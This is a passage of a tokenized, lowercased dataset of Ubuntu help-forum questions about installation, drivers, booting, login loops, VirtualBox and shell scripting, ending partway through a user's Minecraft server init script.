161653	how to change background picture every 5 seconds ?	i want to change my background every 5 seconds but i could n't . is there any application to do this ? or is this a feature hidden in the settings somewhere ? please do help . thanks in advance : )
161654	installer installed system to usb stick , not main hdd	yesterday i installed ubuntu 12.04 to my computer and when i finished i realized that it had installed onto the usb stick . now i have to boot the computer from usb each time i want to use it . what should i do to solve this problem ?
161657	wireless mouse temporarily freezes ( sleeps ) on battery power	i have been getting a very annoying problem since recently in ubuntu 12.04 , probably due to another update that did more bad than good ... when i resume from sleep on battery power my lenovo thinkpad t420 , my wireless laser mouse ( logitech m705 ) freezes everytime i leave it for 2 seconds . it then starts moving again when i shake it for 5 seconds . the touchpad works normally . i 'm guessing the mouse enters some sleep mode and i 'd like to know where to change this `` timeout '' value .
161662	how to force a new notification in notify-osd to show up without waiting for the earlier one to exit ?	i have made a script ( and a .desktop shortcut leading to this script ) for starting and stoping xampp ... it checks the status of xampp and accordingly either starts or stops xampp . now i have assigned a notification as soon as the script is started to display `` starting xampp ... '' or `` stopping xampp ... '' and then when xampp is started or stopped , it displays `` xampp started ... '' or `` xampp stopped ... '' i 've used notify-send to show notification as seen in the script below now the thing is that here , the second notification waits for the 1st one to disappear and then pops up even if xampp has started/stopped . i want the new notification to appear immediately by forcing the earlier one to exit before the completion of its life-cycle . this can be seen to take plce when you activate/deactivate wireless/networking immediately ... for example the `` wireless enabled '' comes up on selecting enable wireless and if you immediately select disable wireless , the `` wireless disabled '' notification comes up without waiting for `` wireless enabled '' notification to complete its life-cycle . so how do i achieve this ? # ! /bin/sh service='proftpd' if ps ax | grep -v grep | grep $ service > /dev/null then notify-send -i /opt/lampp/htdocs/xampp/img/logo-small.gif `` stopping xampp ... '' & & gksudo /opt/lampp/lampp stop & & notify-send -i /opt/lampp/htdocs/xampp/img/logo- small.gif `` xampp stoped . '' else notify-send -i /opt/lampp/htdocs/xampp/img/logo-small.gif `` starting xampp ... '' & & gksudo /opt/lampp/lampp start & & notify-send -i /opt/lampp/htdocs/xampp/img/logo-small.gif `` xampp started . '' fi on the man page for notify-send i found -- urgency=level or -u where levels are low , normal , critical . is this of any use ? making it critical ? also i tried it with the command- notify-send -u=critical '' testing '' but that dint work ... it gives the error- unknown urgency criticaltesting specified . known urgency levels : low , normal , critical . or if i give the command notify-send -u=low '' testing '' it gives me error missing argument to -u any relation ? ? information from comments , for some reason this is working in a wierd way ! it shows up a dialogue box instead of notification for the part `` starting xampp.. '' and `` stopping xampp.. '' and then shows a notification of `` xampp started '' or `` xampp stopped '' ... : / the dialogue box copes up with ok and cancel buttons !
161665	how to convert docx to doc with terminal	i looked around in google to see if there was a way to convert docx files to doc through the terminal and i found some potential solutions using perl 's xmllib , but i was wondering if there was another way to do it , solely through the use of the terminal . i guess a better question should 've been , is there something similar to textutil for linux ?
161668	where can i find the mon-* set of amazon cloudwatch tools ?	once upon a time , based on the large quantity of websites saying that all i needed to install to administer amazon services including cloudwatch and auto-scaling groups was the `` ec2-api-tools '' package . however , as i try to recreate some steps found in pages like this , i find i can not succeed due to missing commands . i 'm assuming these commands were simply refactored , but searching for , e.g. , mon-describe-alarms or mon-put-metric-alarm with apt-file yields no results . it 's as if someone decided , `` nawww ... nobody will need these ! '' and removed them from ec2-api-tools with no substitution provided . does anyone know what happened , and/or where i can find an ubuntu package for the cloudwatch tools ? many thanks in advance !
161669	i cant push my app to ppa with quickly submitubuntu command	i have the launchpad the ppa and the project configured but when i try to quickly submitubuntu it aborts . i tried to create the debian package with quickly package -- extras and it worked and with the 'quickly package ' it worked too , i do n't understand ... this is my submission to the app showdown ... the error : glink @ glink : ~/mydev/src/src-install $ quickly submitubuntu obter definiă§ăľes do launchpad bzr : error : the user fernandofreamunde has not registered any ssh keys with launchpad . see < https : //launchpad.net/people/+me > launchpad connection is ok ... ... ... ... .ubuntu packaging created in debian/ ... error : quickly ca n't release : ca n't push to launchpad . erro : o comando submitubuntu falhou a abortar glink @ glink : ~/mydev/src/src-install $
161670	wireless is connecting but internet is not working	in my laptop , its connecting to the wireless device and everything is fine . but , its not connecting to internet . how can i fix this properly ?
161677	makeinfo package not found in 12.04	please can anybody give me an answer for this ? i have already tried : sudo apt-get install makeinfo textinfo texi2html but , i still get the error : unable to find the pacakge .
161678	i have ubuntu server 11.10 64-bit . updates were working but now fails every time after apt-get update	this is what i get when i try to run apt-get update err http : //security.ubuntu.com oneiric-security inrelease err http : //us.archive.ubuntu.com oneiric inrelease err http : //security.ubuntu.com oneiric-security release.gpg temporary failure resolving 'security.ubuntu.com' err http : //us.archive.ubuntu.com oneiric-updates inrelease err http : //us.archive.ubuntu.com oneiric release.gpg temporary failure resolving 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com oneiric-updates release.gpg temporary failure resolving 'us.archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric-updates/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/release.gpg temporary failure resolving 'security.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/oneiric-updates/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : some index files failed to download . they have been ignored , or old ones used instead .
161679	how to install collada ?	i have found a model airplane that can be downloaded as a collada file , but i am still a newbie on ubuntu and i need to know how do you install collada on ubuntu 12.04 precise .
161682	how to run a script only a single time ever ?	the script is supposed to run only once , ever . i though to create a file when the script runs the first time and if that file exists , the script will not run again . what 's the best , most clean place , to autostart the script so it runs only once ?
161685	how to user interact during boot using upstart ?	i want to add a question during boot . the user is supposed to make keyboard inputs and depending on those inputs , there is an if inside the script . `` do you want x or y ? '' `` or simply wait 10 seconds to default to x . ''
161686	where is vlc media player installed ?	i have vlc media player as a .deb file which i installed successfully . however i do not know where the the installation file is located.in windows all files are placed in program files , so i am a bit confused.my main question is : can i change the file location or can i know the location where the file has been installed ?
161689	how do i get grub2 to boot a truecrypt-encrypted mbr ?	given the following system : /dev/sda1 windows , encrypted using truecrypt /dev/sda2 /boot /dev/sda3 / , encrypted ( luks or how it is called ) i now need grub2 to boot my truecrypt mbr ) : any hint on this ? i found some guides for grub2 and truecrypt , but they all assume that the linux root partition is not encrypted , which is the case in my situation ) :
161692	impossible to boot my laptop	i look on internet a lot of answers but no one can fix my problem ... i ca n't chose anyone of my os ( ubuntu , w7 & w8 ) because by mistake i chose the recovery system of my acer s3 without cd drive . when this program start i chose the exit option in the first screen . the laptop restart and the screen shows the next error . error : unknown filesystem grub rescue i use the `` universal usb installer '' with diferent versions of ubuntu *.iso 10.10 desktop and netbook i386 , also 11.04 & 12.04 desk i386 . the screen shows . syslinux 4.06 edd ... ... peter anvin et al _ i change the program and i try with `` unetbooting '' to create an other type of usb stick bootable . the screen shows syslinux 4.03 ... ... peter anvin et al _ nothing happens . i try with `` rescatux.iso '' but is the same screen ... i modified all the different options on the bios but nothing change . somebody have an idea about how to fix it ? tx 4 your time . : )
161695	xlib : extension `` glx '' missing on display `` :0 '' . asus k53s	i had everything working fine , i use a number of opengl graphics software , example pymol , mgltools , vmd , ballview , rasmol etc . all of these give the error : xlib : extension `` glx '' missing on display `` :0 '' . and fail to initialize . i have an i7 asus k53s with nvidia gforce i need these to do my work . i tried the umblebee fix , and just removing all nvidia drivers , or rolling back . i do not know why these were working then stopped , but did notice a new nvidia console in the mu which i assume was from enabling the automatic nvidia feeds , etc ? i also played with the xorg , however have no clue what settings are valid . in addition , the display is 50 % of the time not recognized now ? it just gives a geeic 640x480 and i have to login and out 10 times to get it to return to a normal setting . when i try and set it manual , there is no other setting allowed from the settings menus , and the terminal changes just get re set every time i log out ?
161697	ubuntu does n't copy video files to sandisk usb flash drive	i recently purchased a new sandisk cruzer glide 32 gigabyte flash drive . i tried to put movies on the flash drive , and it seems to work , but when i plugged it into the ps3 , the video files did not show up at all i.e . nonexistent to ps3 . when i plugged it into a windows 7 computer , instead of `` video clip , '' like all of the other videos put on there from the ps3 , it said `` file , '' and had a different icon . in case the thought occurs to someone , there is nothing wrong with the files themselves . i had another sandisk flash drive , but it was 16 gigabyte , and not `` glide . '' that is what i normally use to transfer video files to and fro the ps3 , but it is not in my possession at the time , so i have not been able to test it yet . when i do get it back , i will test it , and if it works , then i know it is sandisk 's fault and not ubuntu 's . but , since i ca n't test it , i wondered if anyone else has had this problem , has anyway of testing it , etc . i 'm almost sure it is ubuntu though , i have the same problem with another flash drive that is not sandisk , or at least i do n't think so . someone gave it to me , and it has pnc on it , which is a bank , so i 'm not sure if it could just be a sandisk flash drive with a pnc outfit . anyone can help ?
161705	what is the default shell , and are there any other options ?	i am new to ubuntu . looking for the meaning of shell , i got a list of many different shells . so i 'd like to know : which shell is used by default in ubuntu ? what other shells are available ? is there any advantage in switching to another shell ?
161711	how do i get back hard drive space after i have uninstalled ubuntu from windows ?	i installed ubuntu on windows like it says to do it on ubuntu 's website as an application . i did not want it to create a separate partition on my hard drive . a few days ago , i uninstalled ubuntu by going into the windows control panel and hitting uninstall . as you would expect , i would get back my 100 or so gb on the disc . i never really installed anything of importance on ubuntu so i never had a second thought about uninstalling it . but i never got back my 100gb from ubuntu . now when i add up all of the folders on my c drive , they total to the amount i had on windows before i uninstalled ubuntu but when i look at the my computer screen , it says that another 100 or so gb is missing . i tried defragmenting the disc , downloading various disc managers but nothing fixed the space problem . can anyone please help me with this ! ! ? ? ? any help is much appreciated ! just making sure : ubuntu was not on a separate partition , it was installed as an application on windows . it tells yuo how to do this here except i did it with a much older version ( i think it was 8.04 or soemthing ) : http : //www.ubuntu.com/download/help/install-ubuntu-with-windows
161713	how to uninstall a program in wine ?	how do you uninstall a program in wine ? i tried installing a windows program through wine but it did n't work and now i ca n't figure our how to get rid of it .
161719	java using too much cpu	trying to use either eclipse or apache tomcat pushes all 4 cpu cores to around 60 % cpu usage , and trying to run both at the same time maxes them all out . tried deleting all the webapps i 'd deployed to tomcat , no effect . tried editing eclipse.ini to provide more memory ( -xmx2048m ) , no effect . versions : java : 1.6.0_24 eclipse : indigo ( 3.7.2 ) tomcat : 5.5.35
161721	what is x-ayatana ?	i 've heard of the x-ayatana mailing list or something like that.. also when we create .desktop files adding quicklists needs the one line to be added at the start having x-ayatana mentioned ... what is this exactly ? a detailed answer would be gr8.. from community members would be best : )
161725	sound from ubuntu server 10.04	i feel like this should be a no brainer , but i just ca n't seem to figure it out . i am running ubuntu server 10.04 as a virtual machine in vmware fusion . i am simply trying to get there to be some sound that comes out of my laptop speakers . i have installed alsa and moc ( followed these instructions , and it worked fine ) . especially using moc , i can see that the song ( an mp3 ) is playing , but i am not getting any sound out . lspci | grep audio gives me : 02:02.0 multimedia audio controller : ensoniq es1371 [ audiopci-97 ] ( rev 02 ) this does n't seem like it should be that big of a deal , but i just ca n't seem to make it work . any ideas ?
161727	how to make browsers re-adjust web pages because of the sidebar ?	it does get annoying sometimes . chromium has to make a bottom scroll bar for pages because the web pages are configured for the whole screen , and all because of the side application launcher bar . anyway to stop this ?
161731	using juju with private openstack cloud deployment ?	i 'm seeing a number of problems trying to use juju with our internally deployed openstack cloud . most of this appears to be centered around dns host resolution as well as the need to deal with our company 's internal http proxies . our openstack deployment relies upon an unroutable 172.16.0.0/12 block of addresses for vlan allocation to each project ( tenant ) hosted on our internal cloud . user 's have the option of assigning one or more floating addresses to instances , allocated from a block of routable addresses on our internal companies lan . currently , openstack does n't register instance names with anything other than the dnsmasq service running on the cloud controller . as such , there 's no way to resolve this address through our internal dns hierarchy ( this issue has already been reported as bug # 945505 ) . as such , even though i can bootstrap my juju server node , i ca n't connect to it with the juju client , since it ca n't resolve the local ( private ) network name . i am able to ssh to the node , once i 've assigned it an internally routable ( i.e . floating ) address . which leads to the next issue . next , to install software on an instance running in our cloud , it must have our internal proxy address defined - either in the apt.conf file or via environment variables . unfortunately , when bootstrapping the server node , there 's no provision to pass this info into a instance via juju environment.yaml file ( if this is even the best way to handle this issue ) . as a result , the bootstrap node is unable to install the required packages . i 'm assuming ( dangerous , i know ) that the way that i 've deployed openstack in our internal environment is probably not unique . has anyone else encountered these issues ? and more importantly , are work arounds available ?
161732	how do i disable/modify cpu underclocking due to temperature on a laptop with a 2nd generation core cpu ?	i am running ubuntu 11.04 on a tablet with a core i5-2557m processor . when doing processing intensive tasks the cpu is forcibly under-clocked to 800mhz ( instead of the normal base of 1.7ghz . ) the cpu temperature is around 75 c. i have disabled cpu scaling ( set governor to performance ) but this seems to have no effect . i would like to either modify the behavior so that the throttling happens at 95 c or i would like to disable it altogether . changing the min/max frequency as root using cpufreq works until the temperature rises and then it ceases to work , ignoring a minimum frequency above the 800mhz . on windows 7 there is a 3rd party utility that can do this ( throttlestop ) . thank you .
161736	ubuntu box just redisplaying login screen after update	my ubuntu 12.04 box has been working fine . a recent update may have messed something up . i normally run remote windows on it , and i noticed that my windows were failing to start up . i then tried logging into it directly from the gui console , and i 'm seeing that after i press enter on the ( valid ) password , the page just redisplays . it 's not a password error , as that would give me an inline error . i see some messages appear and disappear quickly between the login screen going away and then redisplaying , but they go away too quickly to read . i was able to run the non-gui login , and i did an update and upgrade , and then rebooted , but it 's doing the same thing . i have a samba connection from my windows box , and that 's still working . if it matters , here 's my uname output ( somewhat elided ) : linux ... 3.2.0-26-generic # 41-ubuntu smp thu jun 14 17:49:24 utc 2012 x86_64 x86_64 x86_64 gnu/linux what can i do to troubleshoot this ? note that when i select `` guest session '' , it lets me log in and displays the window manager . this seems significant to me . does this mean that something specific to my login is causing it to fail ? note : if it matters , here 's the output from /var/log/dmesg . the line about gdm seems interesting : [ 9.815883 ] bluetooth : rfcomm tty layer initialized [ 9.815887 ] bluetooth : rfcomm socket layer initialized [ 9.815888 ] bluetooth : rfcomm ver 1.11 [ 9.879088 ] [ pcspp , tristate ] [ 9.879092 ] parport0 : irq 7 detected [ 9.883935 ] type=1400 audit ( 1341871177.871:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=845 comm= '' apparmor_parser '' [ 9.884365 ] type=1400 audit ( 1341871177.871:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/ntpd '' pid=851 comm= '' apparmor_parser '' [ 9.950397 ] e1000e 0000:00:19.0 : irq 42 for msi/msi-x [ 9.961160 ] init : gdm main process ( 907 ) killed by term signal [ 9.966358 ] lp0 : using parport0 ( polling ) . some other useful information might be in what appears in /var/log/auth.log when i try to log in : jul 11 08:28:32 -hostname- lightdm : pam_unix ( lightdm : session ) : session closed for user lightdm jul 11 08:28:32 -hostname- lightdm : pam_unix ( lightdm : session ) : session opened for user -username- by ( uid=0 ) jul 11 08:28:32 -hostname- lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 jul 11 08:28:32 -hostname- lightdm : pam_unix ( lightdm : session ) : session closed for user -username- jul 11 08:28:32 -hostname- lightdm : pam_unix ( lightdm : session ) : session opened for user lightdm by ( uid=0 ) jul 11 08:28:32 -hostname- lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 jul 11 08:28:33 -hostname- lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` -username- '' jul 11 08:28:33 -hostname- dbus [ 769 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.60 '' ( uid=104 pid=14858 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.16 '' ( uid=0 pid=1329 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` )
161739	why does launchpad fail to find 'glib-compile-schemas ' while building for ppa ?	so , i 'm trying to publish my app in my ppa , but i 'm having problems related with building my app . here you have the output : /bin/sh : 1 : glib-compile-schemas : not found make [ 1 ] : *** [ override_dh_install ] error 127 make [ 1 ] : leaving directory `/build/buildd/virtuam-0.1ubuntu1' make : *** [ binary ] error 2 dpkg-buildpackage : error : /usr/bin/fakeroot debian/rules binary gave error exit status 2 ****************************************************************************** build finished at 20120709-2102 failed [ dpkg-buildpackage died ] ****************************************************************************** even following the solutions posted in launchpad failed to build after `` quickly submitubuntu '' , i have no luck . what should i do ? the build error is this : https : //launchpadlibrarian.net/109704402/buildlog_ubuntu-precise-i386.virtuam_0.1ubuntu1_failedtobuild.txt.gz
161740	can i manually reload the missing files ?	i have ubuntu 10.04 installed on my system . recently , i was swapping out hard drives and , when i rebooted my system , i could not log in . i would enter my username and password ; then the system would return immediately to the login screen and prompted the error message : module is unknown . i found that i was missing seven pam_*.so files from /lib/security ( although i do not know why ) . it happened immediately after i removed a secondary drive . can i simply reload the missing files manually ? is there something that i did to cause the files to disappear ( strong word , disappear ! ) ?
161746	craving acceptable video playback and nothing more , armed with 11.10 . oneiric and blessed with an ati 256mb card	my problem seems to be relatively simple : i would like to be able to watch simple videos on ubuntu 11.10 ( oneiric ) , using an ati mobility radeon hd 3450 , 256 mb graphics card , presently relying on the fglrx driver ( but would readily change to anything that can give me that and a cool fan ) installed from the repositories , but video playback is plain ugly . what i am experiencing : on various players , incl . the default totem , vlc , as well as the mplayer-based smplayer and gnome player video playback is either plain ugly , ( motions are sloppy , occasionally , at lower res . xvid avi videos even leaving a very slight trail , and at faster motions horizontally `` breaking '' in two in the upper segment of the screen ) or just similarly breaking in high resolution h264-encoded 720p , 1080p mkv videos and motion hardly feels continuous , feels like ... dragged . moving any window around over the desktop is pretty blurry , too , ( text in a gedit window for instance becomes unreadable when moved around ) . what i do not need : i will not play any 3d games , need no super fancy desktop effects , or anything , only my videos . my hardware is : dell studio 1535 intel® core™2 duo cpu t9300 @ 2.50ghz × 2 4096mb ram ati mobility radeon hd3450 , 256mb dedicated memory resolution : 1440 x 900 my present software situation : i have installed fglrx successfully , the output of fglrxinfo seems to indicate what it is supposed to : display : :0 screen : 0 opengl vendor string : ati technologies inc. opengl renderer string : ati mobility radeon hd 3400 series opengl version string : 3.3.11005 compatibility profile context however , under `` graphics '' , system settings > > system info displays this : `` driver vesa : m82 ; experience standard '' . what i have tried : ubuntu 12.04 is out of the question : with my hardware it proved to be way too buggy . ( my typical experience with lts distributions . ) ubuntu 11.10. clean install , installing catalyst 12.04 . ( the version suggested by the ati website for my graphics card . ) the output of fglrxinfo proved the driver did n't install properly . reinstalled os . ubuntu 11.10 . ( from now all my tests happened on oneiric ) clean install , fglrx proprietery driver installed from repositories ( i installed catalyst 11.8. , not the post-release update 11.9 , as per this post , tried installing 11.9 too , but it did n't install properly , so i performed a clean os installation again - yes i know i could have removed/purged fglrx , but i am obsessive-compulsive ( and now getting pretty tired and desperate , too ) . ) thought that i might need hardware acceleration , so i tried installing the packages sudo apt-get install xvba-va-driver libva-glx1 libva-egl1 vainfo but realized that libva-egl1 was n't in the 11.10. repositories , so i can not show the output of vainfo . my past : have been an ubuntu user ( and missionary ) for about 5 years , in the past few i have been using karmic , which has become heavily outdated by now ( especially lacking security updates ) , but for video playback i used the proprietary driver available from the ati website at the time , and playback as well as fan and power management was just great . in mplayer i used to use xv overlay . with glxgears i used to get over 3800 fps . if anybody is willing , let alone able to help , it is highly welcome and greatly appreciated .
161754	must i enable the root account to install matlab ?	i 'm trying to install matlab r20112a on ubuntu . my problem is : i get access to the installation gui running ./install from a terminal , but the installer fails when it tries to write on the folder /usr/local/matlab/r2012a ( even though i created this folder before running the installation ) . i assume the problem is i need root privileges , but `` root '' is disabled in ubuntu . i can install the program in my home folder , but this is not a good solution because i want access to the program for all users .
161758	how do i install drivers for nvidia geforce fx 5200 in 12.04 ?	first let me state that i 'm the newest of newbies and really do n't know what i 'm doing yet . the machine that i installed ubuntu on is my old win xp machine that already had the fx5200ep installed in it . i 'm trying to learn this flavor of linux . after installing ubuntu and applying the updates i have 2 screens with exactly the same thing on them including the mouse pointer . i ca n't find how to make it into a dual monitor configuration . i searching the web i find what i believe to be the correct driver but have no idea of how to download it or install it . any advice and assistance would be greatly appreciated . help
161759	how to access shared folder in virtual box	i followed the steps for sharing folders between windows 7 and ubuntu in virtual box . but the folder appear with x sign and give me the following message when open it `` the folder conent could not be displayed '' and when choose `` shared folder '' from `` device '' menu the following is written below '' on the system page , you have asigned more than 50 % of your computer 's memory ( 2.93 ) to the virtual machine ...
161760	terminal transparency problem with background	i am currently running 64-bit ubuntu 12.04 lts on : 1545 dell inspiron laptop intel ( r ) core ( tm ) 2 duo cpu p8600 @ 2.40ghz advanced micro devices [ amd ] nee ati rv710 [ mobility radeon hd 4300 series ] when i try to change the profile preferences on the default terminal it will assign the picture to the terminal background but it will also enable the transparency option . is there anyway to make it just show the image and not have the transparency on also ?
161766	which is the best multitrack recording software ?	what is the best multi-track recording software for ubuntu ? i know ardour is one of them but i heard it is a bit complicated to use .
161767	the installer does n't start	i downloaded ubuntu-12.04-desktop-i386.iso and burned it onto a cd . that went fine . i started my notebook from the cd and that went fine too . after a while i get a screen with the launcher at the left side of the screen . the second icon from the top is `` install ubuntu 12.04 lts '' . i double-click it , but nothing happens . at the right side , there 's a separate `` install ubuntu 12.04 lts '' icon . i double-click it , but again nothing happens . should i be doing something else to install ubuntu on the harddrive ? btw , the notebook is an asus eee 901 with a solid state harddrive . thanks !
161772	mythbuntu-default settings not installing : 12.04 lts	i was just installing some rather nice desktop environments ( gnome , lubuntu , xubuntu , etc ... ) when i decided , you know what ? mythbuntu sounds awesome ! i 'll get that too . now whenever i log on i get crash report , an internal error , system error , and update manger is telling me `` package system broken '' i do n't need mythbuntu but i do enjoy it , is there a quick and easy removal , or fix ?
161774	do 'tunables ' in 'powertop ' help on battery life ?	i installed powertop 1.97 and i got many bad in tunables , i know i can press enter to toggle but does it really change anything ? and if it does will it still be changed when i reboot ? if i get everything to show good will it make a big difference on the battery life ?
161777	ubuntu 12.04 in vmware ca n't detect the shared folders	i just installed ubuntu 12.04 via vmware on macos 10.7.4 . i assigned a shared folder and gave ubuntu the right to read/write it.but now i ca n't find this folder in ubuntu . i know in win7 i can find it on desktop . can you guys tell me what to do ? also the vmware tools were installed . thanks .
161778	how do i use wget/curl to download from a site i am logged into ?	some parts of wikipedia appear differently when you 're logged in . i would like to wget user pages so they would appear as if i was logged in . is there a way i can wget user pages like this http : //en.wikipedia.org/wiki/user : a this is the login page : http : //en.wikipedia.org/w/index.php ? title=special : userlogin & returnto=login & campaign=acp3
161781	ubuntu server installation freezes during installation	i have an old gateway tower that was running windows xp , but after xp stopped working on me , i decided to make it into a server , and install ubuntu server . but , it keeps freezing on me . during this setup , this happened once to me while i was selecting the keyboard layout , but now , it happened after i partioned the disk . ( right now it is at 34 % of `` installing the base system '' ) last time , i just turned the computer off , and it worked again , but i remember hearing someone say that if you turn off your computer while it is partioning the disk , that it could corrupt your files . is it safe to turn off , and is there any other way to fix this ?
161783	how can i determine which version of amd catalyst is installed ?	all official amd documents refer to the amd proprietary graphics driver by the catalyst name and version . in the ubuntu repository the driver is referred to only by the fglrx name and version . as a result , it is impossible to determine whether official amd documents apply or not . is there a log somewhere which includes the catalyst version ? perhaps some command ? since the machine is headless i would prefer a terminal-only command . if not , where can i find a list of which fglrx versions are equivalent to which catalyst versions ?
161788	will installing amd drivers conflict with intel hd switchable graphics ?	i have an acer which has an intel i5 sandy bridge and an amd hd 6650m . i want to install amd graphics drivers . will this cause conflict between the intel hd3000 and amd hd 6650m ? if so , how do i resolve it ? ( using ubuntu 12.04 64 bit )
161789	why does 11.04 server fail to boot with 'ca n't find /sbin/init ' ?	i just restarted my server and now when i boot up one of my ubuntu 11.04 server instances i am greeted with errors . it does n't boot up . i am pretty sure this is not a hardware error as i have other servers that are successfully booting up . in case it is relevant , all of these machines are running on a proxmox server . i tried running the recovery tool but i am not having any luck solving anything . when i try to mount /dev/sda1 in recovery it looks like there is nothing but the kernel on the disk . what can i try ? ? needless to say i really do n't want to reinstall ubuntu and wipe my disk clean . thanks ! edit : when i try to mount the root partition and go in the target folder i only get : it looks like i am supposed to mount the /dev/webapps-local/root drive to the /target folder , but when i do i get a `` segmentation fault '' error .
161790	errors during installation	setting up quake3-data ( 1-0ubuntu2 ) ... /var/lib/dpkg/info/quake3-data.postinst : 24 : [ : /host/games : unexpected operator /var/lib/dpkg/info/quake3-data.postinst : 32 : [ : /host/games : unexpected operator cp : omitting directory `/host/games' cp : can not stat `installed/quake-3/baseq3/pak0.pk3 ' : no such file or directory dpkg : error processing quake3-data ( -- configure ) it shows up during every installation . i just used this command : sudo dpkg -- force-all -r ubuntu-docs i can reinstall fglrx again , i dunno how it got removed , i was playing with compiz and the inevitable thins that would happen to a noob thing occured . : / so just installed fglrx , hope things work out fine . now i wan na get rid of that quake3 error .
161794	secure is installation of ubuntu or should be dual with windows ?	i have used ubuntu for almost 6 months full time at home while using windows for almost 6 years , so i previously used ubuntu on separate hard drive while i have one attached hard drive with partitions having ntfs file system so i used data from those partitions also . now i want to again shift to ubuntu as i am a web developer and want to use ubuntu and i have a hp probook . so i just want to know few things : should i use wubi ? but i have heard it is on windows installtion mercy still that is not good . should i use dual boot and configure it separately without any wubi e.t.c. ? or should i install separate ubuntu on whole hard disk ? it seems like 3rd option is good but main concern in that case is that how will my data be safe ? like if my ubuntu is corrupted or need to install again or uninstall in any case , then i will need to format whole disk and all my data will be deleted as it is on unpartitioned space . so this seems to be unsafe . actually i am not sure , but another option i have is to have some partitions and some unpartitioned space and install ubuntu on unpartitioned space and if i will remove ubuntu at some time or it will be removed some how then i will have my data safe in partitioned space . the way i am thinking really make sense ? i have been actually windows user so may be thinking in that way , and want to know that how mostly people use ubuntu while feeling safe about their data . what is best way to use ubuntu ? please tell whatever you know so that i can understand the way better . thanks
161802	how do i select a field/column from the output of `ls -l` ?	my goal is deceptively simple ( at least to me ) . i wish to take the output of ls -l or ls -lh and select just one field . i am looking for this to be as bulletproof as possible , by which i mean , assume that filenames can have a variable number of spaces , not everything in the field has the same length , etc . bonus points for having a script that will take the name of the the field ( or even just a field number ) , and then return the contents of the field . i want to turn into :
161813	how safe is upgrading to 12.04	being new to ubuntu i try to avoid any install without looking for problems others have experienced . the upgrade to 12.04 seems to have had quite a few users experience problems . do these generally get resolved or are they sometimes bugs ? is there an approach that can be used to determine the impact on particular applications , or a list of known problem apps ? update : desktop , new with on board graphics . i guess i am just trying to get a handle on how smoothly upgrades are in general with ubuntu . i am on 11 and shortly after got advised of the upgrade to 12 being available . i do not think i have any special apps yet , but did install kubuntu too . although switched back to ubuntu most of the time . but seeing lots of the problems relate to basics like ethernet connections got a little nervous as i have no idea of the size of userbase and whether the experienced problems are a rarity or common issues . do such issues feed back to devs and result in a maintenance release if a bug is uncovered for example .
161817	virutalbox always get back the same ip	i exported a virtual machine from my work station , and i am trying to renew the ip-address at home . i put one copy on my laptop and one copy on my pc . i 've done this sudo rm /etc/udev/rules.d/70-persistent-net.rules and changed the mac address , but they keep coming back as 192.168.1.165 . i need them to be different because i need to run two of these exports at the same time , so i can not afford to have the same ip . what can i do ? thanks .
161819	are drawing tablets supported in ubuntu	i was wondering if digital drawing boards ( handwriting tablets , pen tablets , drawing tablets , graphics tablets ) are supported in ubuntu for presentations , pointing devices and normal drawing . for example : the reason i ask is for some video tutorials i am making and it would make my life a little easier to explain some stuff while drawing it .
161822	ubuntu is n't booting from hard drive after booting it from usb into my system	i installed ubuntu 12.04 on my laptop hard drive from bootable usb and now when i took it out and restarted it , its just showing a blinking courser and when i plug the same usb back it works .
161825	macbook pro 8,2 graphics switching - ubuntu 12.04	i 've been reading docs and various pages for a few hours now and ca n't seem to put all of the pieces together on this . basically i am trying to get 12.04 installed on my mbp 8,2 with graphics card switching working in some way or another . my basic understanding is that i need to do an efi boot install of ubuntu so that graphics card switching will work ( due to the hardware design ) . from there i may be able to use one of the kernel modules for graphics switching : https : //help.ubuntu.com/community/hybridgraphics that article is n't clear on whether i need to do an efi install . i have also seen comments in posts here that say and efi install works by default as long as you have refit installed . overall , i 'm quite lost as to the simplest way to proceed to get an install up and running with graphics switching . i do n't mind using open source gfx drivers as long as the basics work . any help towards a solution is greatly appreciated .
161828	unexpected eof and end of document	i have been fiddling with this code for a few days . mind you i am a beginner . i just want to get my script to be able to download a remote file , and scan minecraft plugins . i got the scan plugins to work , but i 'm having two other issues . one , i ca n't get the mc_addplugin to work correctly , and i get a unexpected eof and unexpected end of document when running any other command besides mc_scanplugins or mc_start bash : -c : line 0 : unexpected eof while looking for matching ` '' ' bash : -c : line 1 : syntax error : unexpected end of file help would be so much appreciated ! thanks in advance . # ! /bin/bash # /etc/init.d/craftbukkit # version 0.9.1 2012-07-06 ( yyyy-mm-dd ) # # # begin init info # provides : craftbukkit # required-start : $ local_fs $ remote_fs # required-stop : $ local_fs $ remote_fs # should-start : $ network # should-stop : $ network # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : starts craftbukkit server # description : starts and controls the craftbukkit server # # # end init info # settings service='craftbukkit-1.2.5-r1.0.jar' options='nogui' username='smith' # list all the worlds in your craftbukkit server folder worlds [ 1 ] ='world' worlds [ 2 ] ='world_nether' worlds [ 3 ] ='world_the_end' worlds [ 4 ] ='flat_world' mcpath='/var/www/servers/foundation' pluginspath='/var/www/servers/foundation/plugins' tempplugins='/var/www/servers/foundationplugins/temp_plugins' backuppath='/var/www/servers/foundation/backup' cpu_count=2 invocation= '' java -xmx2024m -xms2024m -xx : +useconcmarksweepgc -xx : +cmsincrementalpacing -xx : 